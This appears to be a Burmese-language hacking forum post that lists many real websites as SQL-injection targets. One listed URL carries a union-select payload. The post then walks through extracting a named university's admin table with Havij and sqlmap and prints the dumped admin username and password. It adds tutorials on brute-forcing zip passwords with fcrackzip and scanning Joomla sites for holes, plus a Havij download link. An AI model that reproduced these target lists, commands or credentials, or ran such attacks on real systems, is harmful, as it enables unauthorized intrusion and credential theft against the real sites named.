http://www.westcliffepublishers.com/detail.php?id=345'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.glac.fr/en/produit.php?id=76'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://www.skbcases.com/music/news/news-detail.php?id=82'
http://bryanco.com/news_post.php?id=26'
http://weekend.od.ua/news_full.php?id=1531'
http://www.kusuri.co.uk/view_product.php?id=245'
http://www.kusuri.co.uk/view_product.php?id=242'
http://www.charot.com/produit.php?id=20'
http://www.nicolasmarquis.com/site/produit.php?id=%2733'
http://www.indianewsheadlines.com/post.php?id=8006'
http://www.dentistry.co.uk/news/news_detail.php?id=2292'
http://www.dentistry.co.uk/news/news_detail.php?id=1330'
http://www.manka-creations.com/AG/produit.php?ID_produits=4'
http://www.carldavey.co.uk/product.php?id=2'
http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=180'
http://www.walkamilepeterborough.com/participant.php?id=95'
http://www.gielighting.com/ang/_produit.php?id_cat=7'
http://www.manka-creations.com/AG/produit.php?ID_produits=28'
http://www.clicfolio.com/clicfolio/curriculum.php?id=5079'
http://www.wardrobesystems.co.uk/preview.php?id=365'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.peabody.uga.edu/news/event.php?id=59'
http://snakedancecondos.com/pages.php?id=10'
http://www.zoolyshop.com/productinfo.php?id=201'
http://mx5.brighton-rock.net/BandInfo.php?ID=315'
http://mx5.brighton-rock.net/BandInfo.php?ID=643'
http://www.skbcases.com/industrial/products/prod-detail.php?id=235'
http://elmercadohispano.com/prod_detail.php?ID=284" onclick="sa_mpTC(event, this); return
false;'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.retroinferno.com/viewproduct.php?id=235'
http://core.materials.ac.uk/search/detail.php?id=1300'
http://www.clickautographs.com/detail.php?id=1611'
http://brml.technion.ac.il/publications.php?id=6'
http://dufieux-industrie.com/en/fiche_type_produit.php?id=15'
http://www.lindbergbros.com/page/post.php?id=365'
http://www.mvsport-tuning.com/viewProduct.php?id=23'
http://bryanco.com/news_post.php?id=23'
http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17'
http://www.pioneer-group.co.uk/event.php?id=17'
http://ohr.edu/ask_db/ask_main.php?id_number=1310'
http://www.amoryssolicitors.com/main.php?ID=1'
http://boxofficebuz.com/news_full.php?id=36'
http://leavenworth.org/modules/pages/index.php?pageid=1'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=14'
http://www.greenkettle.co.uk/view.php?id=%277'
http://www.discoverypartnerships.com/register/curriculum.php?id=49'
http://www.feicuidao.com/jqzx_look.php?id=26'
http://www.merseyfencing.co.uk/section.php?id=Timber-Fence-Panels'
http://www.tanthrough.com/proddetail.php?id=809790'
http://www.inhealthnw.com/story.php?id=143'
http://www.saleemcarpets.com/prod_detail.php?ID=10'
http://kornerstore.net/ks_proddetail.php?ID=180'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://dpanswers.com/roztr/content_show.php?id=86'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=71'
http://www.hypetrading.com/productinfo.php?id=491'
http://www.mikesmit.com/show_post.php?id=1141826580'
http://www.charot.com/produit.php?id=13'
http://www.coedllandegla.com/download.php?id=2'
http://www.cfnielsen.com/material.php?id=17'
http://ce.et.tudelft.nl/publications.php?id=1755'
http://www.mediflight.com.au/publications.php?id=75'
http://english.euyou.com/shopping.php?id=25&countryid=7'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.medix.com.hr/aboutbook.php?id=33'
http://www.australianewsonline.com/post.php?id=9960'
http://www.dundeetrainingstable.com/news-full.php?ID=16'
http://www.actforkids.com.au/news_full.php?id=134'
http://www.glac.fr/en/produit.php?id=45'
http://www.glac.fr/en/produit.php?id=11'
http://www.glac.fr/en/produit.php?id=51'
http://www.youngatheartministries.com/prod_detail.php?id=3'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://www.flyfishinginmaine.com/story.php?id=58'
http://cherokeeguitar.com/product-detail.php?id=19'
http://www.retroinferno.com/viewproduct.php?id=700'
http://capeyouthadventures.co.za/main.php?Id=6'
http://www.sflcn.com/story.php?id=6946'
http://www.benlongfineart.com/news.php?id=8'
http://www.edwardsymmons.com/pages/news_story.php?id=171'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.iol.umd.edu/People/person.php?id=tweyrauch'
http://www.cornerstone.org.uk/publications.php?id=newsletters'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://www.allnations.net/equipment/prodinfo.php?ID=283'
http://www.coastalengineering.com/staff_pop.php?id=10'
http://www.prespec-consulting.com/theme/theme.php?id_theme=8'
http://komagan.net/readnews.php?id=7'
http://www.aspasiabooks.com/News_View.php?ID=37'
http://www.newmasterplanning.com/project_main.php?id=16'
http://www.biblioteca-ua.com/select_biblio.php?id=-
1599+union+select+1%2Cconcat%28table_name%2C0x3a%2Ccolumn_name%2C0x3a%2Ctab
le_sc
hema%29%2C3%2C4%2C5+from+information_schema.columns+where+column_name+LIKE
+CHAR% 2837%2C+112%2C+97%2C+115%2C+37%29--'
http://biblioteca-ua.com/select_biblio.php?id=1599" onclick="sa_mpTC(event, this); return
false;'
http://www.dentistry.co.uk/news/news_detail.php?id=808'
http://www.dentistry.co.uk/news/news_detail.php?id=2380'
http://yoga.ge/pages/theme.php?id=192%E1%83%99%E1%83%90%E1%83%A0%E1%83%9
2%E1%83%98%E1%83%90'
http://www.lawetalnews.com/post.php?id=144'
http://www.nu.edu.bd/noticeInfo.php?id=355'
http://www.glac.fr/en/produit.php?id=66'
http://www.glac.fr/en/produit.php?id=82'
http://www.anchoryachts.com/preview.php?ID=3'
http://www.tecnologi.net/wp/curriculum.php?id=36'
https://powertraveller.com/news/detail.php?id=000296'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=17'
http://www.f4customs.com/install_pages.php?id=8'
http://www.luimo.org/curriculum.php?id=ST000036'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=21'
http://www.thefastshow.com/virtual_show_detail.php?ID=44'
http://boxofficebuz.com/news_full.php?id=57'
http://www.amouage.com/news.php?ID=10'
http://www.yboaofnc.com/event.php?id=63'
http://www.indianewsheadlines.com/post.php?id=8049'
http://www.sinclairgroup.com/sinclair_web/person.php?id=104'
http://www.samsungmobilers.ro/post.php?id=143'
http://www.johandemeij.com/post.php?id=223'
http://www.chot.org/pages.php?id=88'
http://www.walesdirectory.co.uk/events/event.php?id=2377'
http://riyadhtravel.net/show.php?id=3'
http://iwine.com.hk/product_item.php?id=17'
http://www.dvdholocaust.com/review.php?id=473'
http://computer.ytu.edu.cn/showannounce.php?id=41'
http://www.robotech.com/community/forum/messages.php?id=24'
http://www.sinclairgroup.com/sinclair_web/person.php?id=49'
http://arthurpober.com/pages.php?id=15'
http://www.vertexlaw.co.uk/news/detail.php?id=000056'
http://allnations.net/equipment/prodinfo.php?ID=3'
http://www.allnations.net/equipment/prodinfo.php?ID=236'
http://www.towncityrealty.com/info.php?id=25'
http://www.avmaniacs.com/review.php?id=319'
http://www.watercampws.uiuc.edu/index.php?menu_item_id=44'
http://www.brighton-rock.net/BandInfo.php?ID=479'
http://www.brighton-rock.net/BandInfo.php?ID=555'
http://www.pokenav.net/blog_post.php?id=1019'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=19'
http://capturegis.com/pages.php?id=10'
http://www.saleemcarpets.com/prod_detail.php?ID=57'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.coastal-koi.com/view_product.php?id=1393'
http://mapleislandsales.com/product_detail.php?ID=78'
http://www.sigmaspa.com/web/prod_detail.php?ID=216'
http://www.familiscope.ie/main.php?ID=3'
http://biomed.eng.cmu.ac.th/index.php?newsdetail.php&id=63'
http://www.justcampagne.fr/en/produit.php?id_cat=2&id=88&id_coul=12'
http://www.checkersindustrial.com/product.php?id=74'
http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'
http://www.girls.njpanthers.com/preview.php?id=25'
http://linkinthebox.com/productinfo.php?id=109'
http://www.guruslodge.com/index.php?topic=6484.0'
http://www.edseven.com/item_look.php?id=13'
http://www.pioneer-group.co.uk/event.php?id=16'
http://www.minesandcommunities.org/look.php?id=54'
http://www.nmtf.co.uk/index.php?id_cpg=1'
http://www.bia2.com/music-review/review.php?id=182'
http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'
http://www.rentray.nl/over_rentray.php?id=11'
http://www.hotproperties-bayarea.com/readnews.php?id=11'
http://www.wellydiecast.com/product_detail.php?id=1070'
http://www.cometantenna.com/newPro_detail.php?ID=264'
http://www.wellydiecast.com/product_detail.php?id=7'
http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265'
http://www.robotech.com/community/forum/messages.php?id=23'
http://komagan.net/readnews.php?id=5'
http://www.humormillnews.com/hmill/read.php?id=13'
http://www.natalpress.com.br/humor.php?id=10627'
http://www.yboaofnc.com/event.php?id=8'
http://www.highlandvillage.org/event.php?id=7'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://familynewsabout.com/aboutBook.php?id=3241'
http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'
http://www.cupid.biz/support/opinions.php?id=46'
http://www.traikos.us/trends_opinions.php?id=5'
http://riyadhtravel.net/show.php?id=3'
http://old.brownsvilleherald.com/opinions.php?id=1590'
http://www.zigzagweeklynews.com/opinions.php?ID=6143'
http://www.pcofiowa.com/news.php?id=15'
http://www.fn-franchecomte.com/communique_detail.php?id=29'
http://www.faithinplace.org/news.php?ID=58'
http://www.sedicifilm.it/games.php?id_cat3=55'
http://www.vertexlaw.co.uk/news/detail.php?id=000171'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=321'
http://www.wildarttaxidermy.co.uk/gallery.php?id=16'
http://www.highlandvillage.org/event.php?id=72'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=339'
http://www.llangollen-railway.co.uk/event.php?id=80'
http://www.fundraisingnetwork.org/cat-Games.php?id=39'
http://www.midlandairmuseum.co.uk/news.php?id=16'
http://core.materials.ac.uk/search/detail.php?id=1300'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://www.bsp.org.uk/news_full.php?id=55'
http://www.clickautographs.com/detail.php?id=1611'
http://flatbearconsulting.com/pages.php?id_pag=6'
http://www.cross.tv/52818?channel_id=1104'
http://www.dmgems.co.uk/pages.php?id_sec=2'
http://capturegis.com/pages.php?id=10'
http://www.minesandcommunities.org/look.php?id=101'
http://www.clickautographs.com/detail.php?id=972'
http://www.dentistry.co.uk/news/news_detail.php?id=808'
http://www.familiscope.ie/main.php?ID=3'
http://www.constructionspares.com/main.php?ID=6'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://www.punp.edu.ph/main.php?id=33'
http://www.notebookfocus.com/readnews.php?id=343'
http://www.westcliffepublishers.com/detail.php?id=345'
http://www.seanscottphotography.com.au/shop_category.php?id=2'
http://cherokeeguitar.com/product-detail.php?id=19'
http://www.bombasticlife.com/place/review.php?id=504'
http://www.sedicifilm.it/games.php?id_cat3=61'
http://www.thecompletepianist.com/material.php?id=7'
http://www.digitaldickens.com/section.php?id=6'
http://www.ec21th.com/productinfo.php?id=194'
http://www.shoppingtang.com/productinfo.php?id=103'
http://www.hbztrade.com/productinfo.php?id=273'
http://www.kingslynnarts.co.uk/whatson_event.php?id=46'
http://www.sheridan-uk.com/news_detail.php?id=52'
http://mappn.com/game.php?id=11'
https://powertraveller.com/news/detail.php?id=000126'
http://lemhiweb.com/news.php?id=36'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://games.zbeng.net/game.php?id=13'
http://www.drummajorinstitute.org/events/unique_event.php?ID=38'
http://www.falltvpreview.com/show.php?id=1037'
http://dvdholocaust.com/review.php?id=68'
http://dvdmaniacs.net/review.php?id=974'
http://www.mvsport-tuning.com/viewProduct.php?id=23'
http://www.allnations.net/equipment/prodinfo.php?ID=283'
http://www.amoryssolicitors.com/main.php?ID=1'
http://www.twitney.co.uk/theme.php?id=5'
http://ethansreview.com/website.php?id=1'
http://www.henleystandard.co.uk/news/news.php?id=36113'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.svasweb.org/news.php?id=77'
http://www.henleystandard.co.uk/news/news.php?id=799582'
http://www.thejewishmuseum.org/site/pages/event.php?id=348'
http://www.ngo-monitor.org/article.php?id=1564'
http://wminyc.org/event.php?id=1072'
http://www.abalar.es/ampliar_material.php?id_material=11'
http://stadiumsportsllc.com/news_view.php?id=20'
http://www.geneticsandsociety.org/article.php?id=282'
http://www.worldmusicinstitute.org/event.php?id=906'
http://ohr.edu/ask_db/ask_main.php?id_number=222'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=631'
http://baywoodbest.com/listingPop.php?Id=620'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377'
http://www.seanscottphotography.com.au/shop_category.php?id=1'
http://www.edseven.com/item_look.php?id=4'
http://www.peabody.uga.edu/news/event.php?id=59'
http://www.waukee.org/event.php?id=19'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.tourisme-boulognesurmer.com/shopping.php?id=36'
http://www.feicuidao.com/jqzx_look.php?id=29'
http://www.bernard-vidal.com/view-photo.php?id=76'
http://www.portalararuna.com.br/2011/humor.php?id=10'
http://www.spraywaysingapore.com/proddetail.php?ID=17'
http://propartsllc.com/prodDetail.php?ID=596'
http://www.spraywaysingapore.com/proddetail.php?ID=13'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=16'
http://www.equality-ne.co.uk/readnews.php?id=3728'
http://www.plusline.org/article.php?id=4695'
http://www.medpharma-ae.com/showpost.php?id=68'
http://www.guitars4you.co.uk/product-detail.php?id=413'
http://www.girls.njpanthers.com/preview.php?id=21'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://www.gocontempo.com/pages.php?id=2'
http://ohr.edu/ask_db/ask_main.php?id_number=1310'
http://www.glac.fr/en/produit.php?id=47'
http://www.fanfics.ru/read.php?id=1515'
http://www.dvdmaniacs.net/review.php?id=318'
http://www.ath-elite.com.au/trainers.php?id=28'
http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'
http://www.benlongfineart.com/news.php?id=13'
http://gp.org/speakers/detail.php?ID=42'
http://inrecs.com/releases.php?id=1'
http://www.konceive.com.au/riverside/investAnnounce.php?id=43'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179'
http://senl.com/nav/artikel_info.php?id=1388'
http://www.valiani.com/computerised_detail.php?ID=1'
http://dailyexhibit.com/theme.php?id=1224'
http://www.atitelemetry.com/viewapp.php?id=7'
http://www.oldtimephotos.org/gallery.php?id=11'
http://shohomes.com/gallery.php?id=10'
http://www.walesdirectory.co.uk/events/event.php?id=2445'
http://www.nowgen.org.uk/facilities/events/event.php?id=11'
http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'
http://www.cfnielsen.com/material.php?id=17'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.glac.fr/en/produit.php?id=76'
http://www.planetbollywood.com/displayReview.php?id=m101411095354'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'
http://www.suagacollection.com/photo-gallery.php?id=1'
http://www.bonsaitrees.com/gallery.php?id=7'
http://senl.com/nav/artikel_info.php?id=574'
https://www.camillushouse.org/news_center/news_detail.php?ID=78'
http://www.liquidafrica.com/newsdetail.php?id=1246'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'
http://www.robotech.com/community/forum/messages.php?id=24'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.kudosshowers.co.uk/gallery.php?id=3'
http://www.scotclimb.org.uk/gallery.php?id=83'
http://mayfairgames.com/game.php?id=212'
http://www.gorodokboxing.com/material.php?id=1'
http://www.amandala.com.bz/newsadmin/preview.php?id=28'
http://www.wildarttaxidermy.co.uk/gallery.php?id=86'
http://www.scotclimb.org.uk/gallery.php?id=3'
http://www.bonsaitrees.com/gallery.php?id=4'
http://dvdholocaust.com/review.php?id=577'
http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.whatwhenwhere.ie/event.php?id=382'
http://www.djinsure.com/faq/viewFAQ.php?id=13'
http://www.wcac.org/show.php?id=1'
http://www.ebambi.com/profile_view.php?id=100000252'
http://www.polkatheatre.com/event.php?id=43'
http://www.2hgs.com/detail_humor.php?ID=38'
http://www.melbournefineart.com.au/gallery.php?id=18'
http://www.2hgs.com/detail_humor.php?ID=27'
http://www.individualcars.com/inventory/detail.php?ID=685'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.djinsure.com/faq/viewFAQ.php?id=8'
http://www.techvision.co.uk/news.php?id=45'
http://www.nihonmono.com/prod_detail.php?id=11000384'
http://www.nissi-beach.com/section.php?id=13'
http://spokesrecords.com/releases.php?id=12'
http://www.hotproperties-bayarea.com/readnews.php?id=2'
http://asptt.com/running-tour/participant.php?id=14785'
http://www.kagakribet.com/humor.php?id=147'
http://www.ceripp.it/curriculum.php?id=9'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=51'
http://www.yboaofnc.com/event.php?id=3'
http://www.nsche.org.ng/communiquedetail.php?ID=2'
http://www.nsche.org.ng/communiquedetail.php?ID=3'
http://www.4wdsystems.com.au/index.php?id=29'
အထကးပါ Vuln ကးဘးဆကးမာစာရငးသညး H1N1 Hacker ဆမြေဖၚပထာခငးဖစးပါသညး
SQL Injection Attack က Software သ၍ပလပးခငး SQL Injection ကေဆာ သ၍ပလပးလ ြငးရပါေသသညး။ေဆာ ကေတာသနတးကးဆငးတအေခအေနတစး
ခမြာေရထာတာေႀကာငးဆကးတငးေတာစမးသပးလရမညးမဟတးပါ။ကေနားတ Havij ဟေသာ Tool ကစမး
သပးပ SQL attack လပးႀကညးပါမယး။Havij သပ ေအာငးမငးေနသမာစျာရြပါတယး။SQL Injection အ
တျကးလအပးတ Tools ေတျ ကကေနားေအာကးမြာ Download ေပပါမယး။ ပထမဆ Havij က Download
ဆျပါ။ပေတာ SQL Vuln ရြေနတ ကးဘးဆကးတစးခက Havij ရ Target ထမြာထညးပါ။ပနမနာပထာပါတယး
ႊTarget ေနရာမြာ မမ လပးခငးတ SQL vunl ဖစးတဆကးကထညးပါ။ပေတာ Analyze ကနြပးပါ။
ေအာကးပါပမြာ Scann ဖတးေနပေနာကးဆ Current Database ေပၚပ Table ေလေပၚလာပါမယး။
အထကးပါပမြာ Table ေလေပၚလာရငးနြပးပါ ။Main Table တစးခေတျမြာပါ။အခဒဆကးမြာေတာ Main Table
က flashin_sparkms ပါ Get Table ခလပးကထပးနြပးပါ။Get tableကနြပးလကးတအခါမြာ User Table ,
Admin Table စသဖငး Table မာေတျ ႀကရမြာပါ။မမလခငးတ Admin Table ဖစးဖစး User Table
ကဖစးဖစးအမြတးခစးလကးပါ။ပေတာ GET Column ကနြပးပါ။ေအာကးမြာပပထာပါတယး။
GET Columns ကနြပးအပမြာ Password Column ေတျ Id column ေတျေတျ ရမြာပါ။အဒါေတျထမြာပကးဆ
ကးေတျရြေနနငးတာမ အမြနးခစးပ Get data ကနြပးလကးပါ
အဒအခါမြာ Admin ,user ,Id ေတျရ Username .Password ေတျကရရြပါပ။မမ၇ရြလာတပကးဆကးမာ
က ပနးငးဖ မမတာဂတးဆကးရ Login page မေတျ ပါက Havij မြာ Find Admin ဆတာပါပါတယး။
ရြာႀကညးပ၊ Login page က ငးေရာကးနငးပါပ။
Havij န Pen test လပးခငးဒမြာပပါပ။စတးရြညးလကးရြညးနစမးသပးဖကေတာမမတာ နးပါ။
Back Track ၏ SQL Map ကအသပ၍ SQL Inject ပလပးခငး
ကေနားတအခ Back Track ကးသပ SQL Injection တစးခလပးႀကညးႀကမယး။
1.ပထမဆေအာကးပါ SQL Vuln ရြေနတဆကးတစးခကေရျ လကးတယး။
http://www.hu.edu.pk/viewfaculty.php?id=12
2.ပေတာ BT ရ Terminal မြာ cd /pentest/database/sqlmap လရကးပါမယး
3.ေအာကးက ကျနးမနးရကးပါ။မမတာဂတးထညးပါ
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
-u is the vulnerable url အတျကးရညးညႊနးပါတယး။ေအာကးပါ Command မာကလဆကးရကးသျာပါ
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs
or
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
ကေနားတက --dbs ကသတသေဘာက ဆကးနျယးတေဒတာေဘကပခငးတသေဘာပါ
--current-db ကသမယးဆရငးေတာ သကးဆငးတအဓကတစးခကသာပမြာပါ
ကေနားတအခ Current databaseဆပ Data Base Name တစးခရပါပ။ဒမြာေတာ c3recults ပါ။မမတာဂတးအလကးနာမညးေပာငးနငးပါတယး။Command မြာမမ Database name ကေပာငးသပါ
ေအာကးပါ Command ကရကးပါ
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
-- table ကထညးတသေဘာက ကးဘးဆကးထက Tableေတျကဆျေခၚလကးတာပါ။
Admin Cloumnကရဖေအာကးပါ Command ကသသျာပါတယး။
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
အခဆကေနားတတာဂတးရ Name ေတျကရပါပ ….
ေအာကးပါ Command ကဆကးရကးပါ Admin ,Id ,Password ေတျကေခၚတာဖစးပါတယး
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C
id,passwrd,u_name --dump
ေနာကးဆမြာကေနားတ Admin user+password ကရရြလကးပါတယး။
ေအာကးမြာပထာတာေတာ ကေနားတ Pen Test လပးလရလာတ Admin acessပါပ
Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
………………………………………………………………………………………………..
Countermeasures From SQL Attack (SQL Attackရနးမြကာကျယးနညးမာ)
CEH ထကပမာဖငးတကးရကးေဖၚပေပထာပါတယး။ပမြပထာတာရြငးလ Beginnerမာအတျကးေတာ
Knowledge အဖစးသထာရငးလေလာကးပါတယး။
……………………………………………………………………………………………………………………………………….
REF:က Brb (Planet Creator),You Tube,Back Track
Forum,H1n1 (mmcyberdevils),all ItemZ,CEH7,Google
Special Thz to: (G Tone MHU) ၊ BHG၊Myanmar Cyber Army၊
SQL Injection နပါတးသတးေသာ Video မာႀကညးရနး
Sql injection attack Videos
http://www.youtube.com/watch?v=h-9rHTLHJTY
http://www.youtube.com/watch?v=jMQ2wdOmMIA
http://www.youtube.com/watch?v=PB7hWlqTSqs
http://www.youtube.com/topic/QJnLFoEO7Fs/?feature=results_main
http://www.youtube.com/watch?v=bORZlmyDw0s
http://www.youtube.com/watch?v=JqzWPLq7bJY
http://www.youtube.com/watch?v=0z1rt9Y-ON0
http://www.youtube.com/watch?v=qELByGfNJSE
Havij အသပနညး Videos
http://www.youtube.com/watch?v=Qvhdz8yE_po
http://www.youtube.com/watch?v=DMcaqCGHUVc
http://www.youtube.com/watch?v=JdgE7MSsBTc
http://www.youtube.com/watch?v=Ck5bifmAjZk
SQL injection with Back Track Videos
http://www.youtube.com/watch?v=ViezR1Qmcns
http://www.youtube.com/watch?v=hANMjTqFLD8
http://www.youtube.com/watch?v=-F1nBasky6E
http://www.youtube.com/watch?v=2cKJ5l9qYE0
http://www.youtube.com/watch?v=TqvLMWNTBYU
Havij Download ::::::: http://www.mediafire.com/download.php?r3ey1g20q1y69ka
SQL Injection နညးဟာစတးရြညးသခမြနဖတးထဥာဏးေပၚမြာမတညးပေအာငးမငးတတးပါတယး။
နာမလညးလႀကစာပဖတးႀကညးႀကပါ။မသတာကေကားမဖတးပါနတဆငးခငးေအာငးမငးေအာငးႀကစာ
ႀကညးပါ။တစးဆကးမရတစးဆကးစမးသပးႀကညးပါ။မေလာပါန။မရရငးစတးမပကးပါန၊လကးမေလာပါန။
Video မာက Download ဆျပေသခာေလလာႀကပါဥ၊ကေနားေပထာတ Videoမာကႀကညးပါက
ဘယးသ ကမြေမစရာမလပဆရာတစးေယာကးကအနကပးလာပသငးႀကာေပေနသလခစာရမြာပါ။
Black Attack လပးေတာမယးဆရငး Cyber Law ကသတရြႀကပါခငးဗာ။Educational Purpose Only ဖစး
လ Attacking နပါတးသတးပ မမစမးသပးမမတာနးသာဖစးပါသညး။
စာဖတးသမာအာအစဥးေလစာလကး
စေဆာငးတငးပသ - 3thic0kiddi3 (Ethic Kiddie) www.ethickiddie.blogspot.com
ထျကးရြပေသာစာအပးမာ
1.Wifi hacking basic
2.DNN hacking Basic
3.IIS Hacking Basic
4.Network Hacking Basic
5.Loic Tool DDOS Basic
6.SQL Injection Basic
Using Fcrackzip on Backtrack 5 Posted by Aung Kyaw Moe
အခ ကၽြနေတာ Backtrack မာပါတ tool တစခ အရမးအသးငတ tool တစခေပါ အအေၾကာငးက ကၽြနေတာေရးေပးလကပါတယ Fcrackzip ပါ သက နာမညအတငးပ zip ဖင password ေတြက
ျဖညတ tool ေလးတစခပါ တစခကၾကညလကရေအာင
ဖငအသစတစခကေဆာကပါမယ ပမာျပထားပါတယ……….
အခ wine ေအာကက rar ကေန အေစာကဖငအသစေဆာကထားတာေလးက zip လပပါမယ…………….
.
rar ကေနတစဆင ခဏက txt ဖငေလးက zip လပပါမယ ပမာျပထားပါတယ
ေနာက Advance ကေရြးျပ password က ကယၾကကတာထညလကပါ စမးမာဆေတာ ဿ-၆လးၾကားထညရငပအဆငေျပပါတယ…………..:P ပမာျပထားပါတယ……ကယၾကကတ pass ေပးျပးရင ok လကပါ သးရတာလြယေအာင Desktop ေပၚမာပထားပါေနာ……….
ေနာက fcrackzip ရတေနရာကသြားပါမယ သက Application>Backtrack>Privilege Escalation>Password Attack>Offline Attack>Fcarckzip ပါ ေနာက သက Forensics tool ထမာလညးပါပါတယ အစလကၾကရေအာင……..ပမာၾကညပါ
fcrackzip ကဖြငလကပါ သ႕ရ႕ usage ကလာပါလမမယ………..ပမာျပထားပါတယ…………
က စလကၾကရေအာင သ႕ရ႕ Useage commend ကေတာ fcrackzip -b -c a -l 1-5 -u /root/Desktop/hello.zip ပါ ဒေနရာမာနညးနညးေလရညခငပါတယ ဟတစေန႕က ကၽြနေတာတ႕ Group ထမာ ေမးထားတေမးခြနးက negative က ျပနေျဖထားတာေတြ႕ပါတယ အထက ဒါက brute force attack ပါ……… အအေၾကာငးကေတာ negative လညးေျပာျပးသားဆေတာ ကၽြနေတာလညးထပမေျပာေတာဘး အအေပၚက command ေလးက ေပးလကရေအာင……..ပမာျပထားပါတယ…………:P
Password Found!!!!!!!!!!! pw= aung တ ျမနတယေနာ သက ဿ-၆လးၾကားဆအရမးျမနပါတယ နနPassword ကရညေလ နနၾကာေလပါပ အခေတာ စကန႕ပငးေလာကပၾကာပါတယ
အမားဆးေပးတာကလညး zip password ေတြက ၆လးေလာကအထပေပးၾကတာမားပါတယ တစခ႕ဆဒေတြက သ႕ဆဒနာမညေတြေပးၾကာပါတယ ကမနမမနျဖညၾကညရေအာင ……………:P
ကေျဖလကပါမယ ok ေပါေနာ ရမရေအာကမာၾကညရေအာင……….:P
ေကးဇးတငပါတယ ဆကလကၾကးစားပါဥးမယ ဒထက ေကာငးတ ပ႕စေတြ Tool Tutorial ေတြေရးေပးခငေသာလညး ပတစပတငဖ႕ေတာင အႏငႏငျဖစေနလ႕
ကြနေကာငးဖ႕ပဆေတာငးေနရပါတယ
Using Joomscan in Backtrack 5 R3 Posted by Aung Kyaw Moe
အခ Backtrack မာပါတ Joomscan အေျကာငးေလးတငျပပါမယ အဒါကေတာ ကြနေတာတျမနမာနငငကေရးထားတာပါ YGN Ethical Hacker Group ကေနထတထားတ tool ပါ ကေအာငခနေရးထားတာပါ ကြနေတာတျမနမာေတြလညးစြမးပါတယေနာ Backtrack ထမာ Tool တစခပါတာဂဏယစရာပေလေနာ
စရေအာင Joomscan ကသးမာဆေတာသအေျကာငးေလးနညးနညးေျပာပါမယ သက Joomla အေျခခထားတဆဒေတြက ေပါကမေပါကစစတ tool ပါ အတစခေျပာအးမယ ဟတစေလာတနးက ဘဂါလဆဒေတြတကတနးကဒါေလးကေတာေတာက အသးငတာဂာ ဟးဟး ကစရေအာင ပထမဆး joomscan ကဖြငလကပါ
ဖြငျပးရငျမငရမယပပါ အရငဆး update လပဖအျကေပးေစခငပါတယ ကြနေတာကေတာလပျပးသားပါ
ေအာကေတာသရ option ပါ
ေနာက ဆဒတစခကရာပါမယ joomla အသးျပတဆဒေပါ powered by joomla 1.5 ဘာညာေပါ google မာရာလကပါ
ကတစခေရြးလကပါေနာ ေရြးျပးရငစျပး scan ဖတရေအာင သ command ေတြကေတာ ./joomscan.pl -u www.victim.com ပါ ေအာကမာျကညပါ
ေနာကေအာကကပကေတာ scan စ ဖတတပပါ
ေအာကကပကေတာ scan ဖတျပးသြားတပပါ vuln 5 ခေတြ႕ပါတယတ ေပာထာ………:P
ကဘယဟာေတြေပါကေနလ ၾကညရေအာင အေပၚက scroll up လကပါဗာ အမာ vuln မာ yes လ႕ျပထားပါတယ
က ပထမဆး vuln ျဖစတ /htaccess.txt ကဖြငၾကညရေအာင
က ဒေလာကပလပျပပါမယ ေနာက vuln ေတြကေတာ ကယဘာသာ ဆကျပး စမးၾကညလကပါေနာ
ဆကလကၾကးစားပါအးမယ
ေအာငေကာမး
10100101010101010101011010101
01010101010101010101001010101
01010101010101010101010101011
01010110101001010101001010010
